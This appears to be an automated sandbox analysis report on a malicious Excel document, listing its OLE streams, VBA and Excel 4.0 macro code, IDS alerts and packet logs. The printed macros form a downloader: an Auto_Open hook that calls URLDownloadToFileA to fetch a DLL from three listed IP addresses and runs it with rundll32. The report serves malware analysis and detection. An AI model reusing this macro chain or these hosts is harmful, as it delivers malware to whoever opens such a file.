                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 b0 04 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                    VBA Code Keywords

                                                                                                                                                    Keyword
                                                                                                                                                    Function
                                                                                                                                                    Application.Run
                                                                                                                                                    Attribute
                                                                                                                                                    Auto_Open()
                                                                                                                                                    VB_Name
                                                                                                                                                    "Byutut"
                                                                                                                                                    Public
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "Byutut"



Public Function Auto_Open()

Application.Run Sheets("Nyukasl").Range("AM5")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")



End Function
                                                                                                                                                    VBA File Name: Class1.cls, Stream Size: 999
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/Class1
                                                                                                                                                    VBA File Name:Class1.cls
                                                                                                                                                    Stream Size:999
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                    VBA Code Keywords

                                                                                                                                                    Keyword
                                                                                                                                                    False
                                                                                                                                                    VB_Exposed
                                                                                                                                                    Attribute
                                                                                                                                                    VB_Name
                                                                                                                                                    VB_Creatable
                                                                                                                                                    VB_PredeclaredId
                                                                                                                                                    VB_GlobalNameSpace
                                                                                                                                                    VB_Base
                                                                                                                                                    VB_Customizable
                                                                                                                                                    VB_TemplateDerived
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 543
                                                                                                                                                    General
                                                                                                                                                    Stream Path:PROJECT
                                                                                                                                                    File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                    Stream Size:543
                                                                                                                                                    Entropy:5.37319650849
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:I D = " { 6 5 E C 9 F D C - 2 0 9 0 - 4 6 C 0 - 8 5 8 F - 4 1 2 6 6 D 3 E 0 1 6 B } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 9 0 B D 9 D F D D D F D D D F D D D F D D
                                                                                                                                                    Data Raw:49 44 3d 22 7b 36 35 45 43 39 46 44 43 2d 32 30 39 30 2d 34 36 43 30 2d 38 35 38 46 2d 34 31 32 36 36 44 33 45 30 31 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8
                                                                                                                                                    Stream Path: PROJECTwm, File Type: data, Stream Size: 107
                                                                                                                                                    General
                                                                                                                                                    Stream Path:PROJECTwm
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:107
                                                                                                                                                    Entropy:3.96151942936
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . B y u t u t . B . y . u . t . u . t . . . . . . . 2 . . . 8 . A . B . 2 . . . C l a s s 1 . C . l . a . s . s . 1 . . . . .
                                                                                                                                                    Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 00 00
                                                                                                                                                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2831
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:2831
                                                                                                                                                    Entropy:4.1308794712
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                    Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                    Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1642
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/__SRP_0
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:1642
                                                                                                                                                    Entropy:3.30953727146
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . b . T Z . . F . v . V . e . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                    Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 146
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/__SRP_1
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:146
                                                                                                                                                    Entropy:1.48909835582
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                    Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 170
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/__SRP_2
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:170
                                                                                                                                                    Entropy:1.65437585425
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
                                                                                                                                                    Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/__SRP_3
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:156
                                                                                                                                                    Entropy:1.63365900945
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                    Stream Path: VBA/dir, File Type: data, Stream Size: 601
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/dir
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:601
                                                                                                                                                    Entropy:6.45605461621
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. U . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O ~ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                    Data Raw:01 55 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a6 4f 7e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                    Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/\x1051\x1080\x1089\x10901
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:990
                                                                                                                                                    Entropy:3.19675892958
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/\x1051\x1080\x1089\x10902
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:990
                                                                                                                                                    Entropy:3.19281939975
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:994
                                                                                                                                                    Entropy:3.21355105334
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,1,,,,,,9,,,"=ON.TIME(NOW()+""00:00:02"",""Milolos"")",,,,,,,,=NOW(),,,,,,"=FORMULA(AH84&AH85&AH86,AJ76)",,,,=HALT(),"=CONCATENATE(AH79,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH80,AI71,AH77,AH78)",,,,,,"=CONCATENATE(AH81,AI71,AH77,AH78)",,uRlMon,,,,,,,,,,.d,,JJCCBB,,,,at,,Belandes,,,,"=""http://185.45.193.80/""",,,,,,http://82.118.21.70/,=GOTO(Blodas!G6),,,,,http://45.144.31.232/,,..\Niolas.dll,,,,,,,,,,,,,,,,"=""UR""",,,,,,"=""LDownloadT""",,,,,,"=""oFileA""",,,,,
                                                                                                                                                    "=REGISTER(Nyukasl!AJ75,Nyukasl!AJ76,Nyukasl!AJ77,Nyukasl!AJ78,,Nyukasl!AJ68,9)""=Belandes(0,Nyukasl!AH73,Nyukasl!AJ81,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AH74,Nyukasl!AJ81,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AH75,Nyukasl!AJ81,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                    ,"=""rund""",,"=""ll32 ..\Niolas.dll""","="",DllRegisterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    05/04/21-05:56:49.914165TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.45.193.80192.168.2.22
                                                                                                                                                    05/04/21-05:57:32.232736TCP1201ATTACK-RESPONSES 403 Forbidden804916845.144.31.232192.168.2.22

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    May 4, 2021 06:02:39.392879009 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:02:39.444907904 CEST8049720185.45.193.80192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:39.448081970 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:02:39.448817968 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:02:39.499607086 CEST8049720185.45.193.80192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:39.706553936 CEST8049720185.45.193.80192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:39.710957050 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:02:39.717806101 CEST4972180192.168.2.682.118.21.70
                                                                                                                                                    May 4, 2021 06:02:42.778491974 CEST4972180192.168.2.682.118.21.70
                                                                                                                                                    May 4, 2021 06:02:48.779213905 CEST4972180192.168.2.682.118.21.70
                                                                                                                                                    May 4, 2021 06:03:00.952579975 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:03:01.034195900 CEST804972945.144.31.232192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:01.034440041 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:03:01.035176039 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:03:01.116686106 CEST804972945.144.31.232192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:01.127298117 CEST804972945.144.31.232192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:01.127418041 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:03:44.719959021 CEST8049720185.45.193.80192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:44.720206022 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:04:06.127988100 CEST804972945.144.31.232192.168.2.6
                                                                                                                                                    May 4, 2021 06:04:06.128079891 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:04:20.672466993 CEST4972980192.168.2.645.144.31.232
                                                                                                                                                    May 4, 2021 06:04:20.672898054 CEST4972080192.168.2.6185.45.193.80
                                                                                                                                                    May 4, 2021 06:04:20.723043919 CEST8049720185.45.193.80192.168.2.6
                                                                                                                                                    May 4, 2021 06:04:20.753931999 CEST804972945.144.31.232192.168.2.6

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    May 4, 2021 06:02:17.344567060 CEST6204453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:17.393310070 CEST53620448.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:17.618839979 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:17.677757025 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:18.235368013 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:18.284024000 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:19.719829082 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:19.768510103 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:20.675038099 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:20.726366043 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:21.725507975 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:21.776650906 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:22.889573097 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:22.938275099 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:22.969773054 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:23.033052921 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:24.524300098 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:24.575913906 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:29.232271910 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:29.283775091 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:30.749293089 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:30.862598896 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:30.926497936 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:30.975297928 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:31.356565952 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:31.428488016 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:32.373449087 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:32.434653044 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:33.389676094 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:33.446822882 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:35.403884888 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:35.489607096 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:35.855920076 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:35.904773951 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:36.858629942 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:36.910571098 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:37.852046013 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:37.903553009 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:38.822787046 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:38.871593952 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:39.420557976 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:39.478554010 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:41.212244034 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:41.261265039 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:43.237472057 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:43.286242008 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:44.203253984 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:44.252123117 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:45.187046051 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:45.243997097 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:52.432549000 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:52.481317997 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:02:56.579284906 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:02:56.637921095 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:12.043811083 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:12.108928919 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:12.724179983 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:12.829241991 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:13.689264059 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:13.749614000 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:14.501096010 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                    May 4, 2021 06:03:14.630208969 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                    May 4, 2021 06:03:15.099541903 CEST5501453192.168.2.68.8.8.8
